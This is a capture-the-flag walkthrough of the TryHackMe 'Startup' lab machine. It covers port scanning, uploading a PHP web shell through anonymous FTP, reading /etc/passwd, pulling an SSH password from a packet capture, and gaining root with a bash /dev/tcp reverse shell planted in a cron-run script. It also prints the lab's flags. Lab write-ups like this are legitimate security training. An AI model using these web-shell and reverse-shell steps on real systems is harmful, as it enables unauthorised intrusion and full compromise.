Writeups
THM Startup
Recon:
We first get all our exposed ports from Nmap, to see what we can work with. After that, we want to see what is the structure of the website, we’ll use FFUF to enumerate addresses we can work with.
nmap -sV -sC -v 10.65.146.102
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.189.141
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Lets test the ftp first with anonymous
We need a password for anonymouse@ftp
ffuf -w /usr/share/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-small.txt:FUZZ -u http://10.65.146.102/FUZZ
We ran some strings cmd xxd and binwalk on the important.jpg hoping for some steganography There wasn’t #### Tried ftp again this time anonymous connected #### Tried dumping a php shell but it didn’t work at first however /ftp took it We put the shell go to the location in the browser and add our ?cmd=id >uid=33(www-data) gid=33(www-data) groups=33(www-data)
Now we can target the recipe we need for the machine @ http://10.65.146.102/files/ftp/shell.php?cmd=cat%20../../../../../recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can’t keep it a secret forever and told him it was love.
We do the same to cat /etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ftp:x:112:118:ftp daemon,,,:/srv/ftp:/bin/false lennie:x:1002:1002::/home/lennie: ftpsecure:x:1003:1003::/home/ftpsecure:
We find a file in /incidents called suspicious.pcapng
Looking through it we find something that looks like a password: >c4ntg3t3n0ughsp1c3
Lets try the lennie user with our “password” …
And yes it is lennie’s password for ssh So we: ssh lennie@ip cat user.txt >THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
If we go to ~/scripts, we find planner.sh and startup_list.txt
The list is empty but the planner’s code is:
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
Tried rewritting the planner which didnt work but we have /etc/print.sh to test
We add a reverse shell: >bash -c ‘bash -i >& /dev/tcp/192.168.189.141/6969 0>&1’
We get root shell
Now we just cat root.txt >THM{f963aaa6a430f210222158ae15c3d76d}
Notes:
Allowing file inclusion is a critical security issue as it allows an attacker to put any file no matter how malicious it is on a machine. In our case we put a reverse shell and then call to it to have it run certain commands. Also, allowing the editing of files once we are in allow us to insert malicious code to finish the full compromise of the machine.
Tools:
- Nmap is the gold standard for port scanning tools.
- FFUF is a tool that lets us enumerate addresses/directories/subdomains, supports recursive search.
- SecLists SecLists and wordlists are almost identical in use but have variations, i find having both to be a net positive.
- Netcat let’s us receive and send data to specific IPs. It allows for crafting of data sent. We use netcat alot for reverse shells.
- PEAS
This helps further reconnaissance by scanning the content of a system.
- linPEAS This is for Linux.